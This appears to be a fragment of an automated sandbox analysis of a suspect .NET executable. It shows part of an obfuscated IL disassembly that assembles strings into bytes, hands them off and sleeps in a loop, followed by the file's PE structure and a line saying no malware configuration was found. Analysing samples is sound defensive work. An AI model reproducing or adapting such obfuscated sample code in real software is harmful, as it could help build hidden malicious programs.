WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::NFlyIHqGLTm stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::qpSkDZfgbco() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::pJMKTmWCqixbDdwsrLS stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::wrHOQeaSqLGpruTnaeOSOgpRp() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::SkJsSTkVdvxBrGesec stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::PCxTHZFDapTYSnPqNeidsJFs() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::yDOOwojfWejIYEJffxAfvZsJj stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xNWiQBqZUOX() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::drmOfIJufLxPAB stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::WEhjoTdTBLaCYTLj() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::gXlfcxqcAlKQML stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::EGwENKLiVKody() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::fiVkjcxrtQnvEBYKEf stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::ZsVraBtEqcZEmmUKxqHNPIaQJ() ldsfld System.String WRlFQcXoBYywkyRRNMnJC.JpEezndipjUFdRgHf::NsSDjXjbXBvetoEPqXYz stelem.ref <null> dup <null> call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::VBSIpqDMBJCckhTAQUfIXZOK() call System.String mwltDFeVwgBcJnXnfKXSKoRqD.JvZElhBIZKvCzwlrzHjygmI::gdqbZjWinCKstkIC() stelem.ref <null> call System.Byte[] WRlFQcXoBYywkyRRNMnJC.pxIeUUIvQumFxrtYYO::EmjMRRtLMKEFIqtodzOXHOHao(System.Object[]) callvirt System.Void WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY::aYppKZtmZMlLmjFToWyg(System.Byte[]) call System.Int32 WRlFQcXoBYywkyRRNMnJC.LubKSewbnKGJY::xVljQSFhgfslhm() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld WmFCTOGVEoMLPqnHUmcv.DBqmHGInvdFrvYcKXXhY 
WRlFQcXoBYywkyRRNMnJC.yluHAmhmffwitzBcHPfOCQ::YZBztjdbFOUHyYQfQAXh pop <null> leave IL_02AE: ret ret <null>

3d8e1e059c4924d652994cb74c893cfa (481.54 KB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
yad7i4kpm66q2iv3t0s5lzbhrr
px3f7aqmhctkn72bt5v
Characteristics
No malware configuration was found at this point.